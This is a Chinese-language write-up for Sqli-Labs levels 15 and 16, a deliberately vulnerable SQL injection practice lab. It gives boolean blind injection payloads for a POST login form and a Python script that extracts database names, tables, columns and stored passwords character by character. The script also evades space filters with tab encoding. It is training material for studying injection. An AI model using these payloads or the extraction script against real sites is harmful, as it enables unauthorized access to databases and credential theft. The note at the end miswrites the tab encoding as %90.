Chybeta

Sqli-Labs:Less15~16-writeup

发表于 | 阅读次数

Sqli-Labs是用来练习sql注入的好平台。project地址:https://github.com/Audi-1/sqli-labs
本文测试环境:使用phpstudy集成环境。mysql版本:5.5.53

Less-15 POST- Blind-Boolian/time Based -Single quotes
Less-16 POST- Blind-Boolian/time Based -Double quotes

Less 15

这关是盲注。没有回显。

payload:

1
uname=admin' and 1=1#&passwd=chybeta&submit=Submit

之后根据页面的登陆与否,即是否有flag.jpg图片出现。构造逻辑语句利用脚本注入。

Less 16

payload:

1
uname=admin") and 1=1#&passwd=chybeta&submit=Submit

登陆成功。

之后根据页面的登陆与否,构造逻辑语句利用脚本注入。

下面给个基于Less 16的脚本:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
import requests
import string
import sys
global findBit
def sendPayload(payload):
	proxy = {"http":"http://127.0.0.1:8080"}
	url = "http://localhost:20000/sqllab/Less-16/index.php"
	data = "uname=" + payload + "&passwd=chybeta&submit=Submit"
	headers = {"Content-Type": "application/x-www-form-urlencoded"}
	content = requests.post(url,data=data,headers=headers,proxies=proxy)
	return content.text
flag = "flag.jpg"
def generateTarget(flag):
	if flag == "database":
		return "database()"
	elif flag == "tables":
		return "(SELECT%09GROUP_CONCAT(table_name%09SEPARATOR%090x3c62723e)%09FROM%09INFORMATION_SCHEMA.TABLES%09WHERE%09TABLE_SCHEMA=0x786d616e)"
	elif flag == "columns":
		return "(SELECT%09GROUP_CONCAT(column_name%09SEPARATOR%090x3c62723e)%09FROM%09INFORMATION_SCHEMA.COLUMNS%09WHERE%09TABLE_NAME=0x6374665f7573657273)"
	elif flag == "data":
		return "(SELECT%09GROUP_CONCAT(gpass%09SEPARATOR%090x3c62723e)%09FROM%09ctf_users)"
def doubleSearch(leftNum,rightNum,i,target):
	global findBit
	midNum = (leftNum + rightNum) / 2
	if (rightNum != leftNum +1):
		payload = 'admin") and%09(%09select%09ascii(substr(' +generateTarget(target) +"%09from%09"+ str(i) +"%09for%091))<="+str(midNum) +")%23"
		recv = sendPayload(payload)
		if flag in recv:
			doubleSearch(leftNum,midNum,i,target)
		else:
			doubleSearch(midNum,rightNum,i,target)
	else:
		if rightNum != 0:
			sys.stdout.write(chr(rightNum))
			sys.stdout.flush()
		else:
			findBit = 1
			return
def exp():
	global findBit
	i = 1
	findBit = 0
	print "The database:"
	target = "database"
	while i :
		doubleSearch(-1,255,i,target)
		i += 1
		if findBit == 1:
			sys.stdout.write("\r\n")
			break
exp()

注:脚本中的payload的空格我用%90替代了,它对应tab键,可用于绕过对空格的过滤。

微信扫码加入知识星球【漏洞百出】
chybeta WeChat Pay

点击图片放大,扫码知识星球【漏洞百出】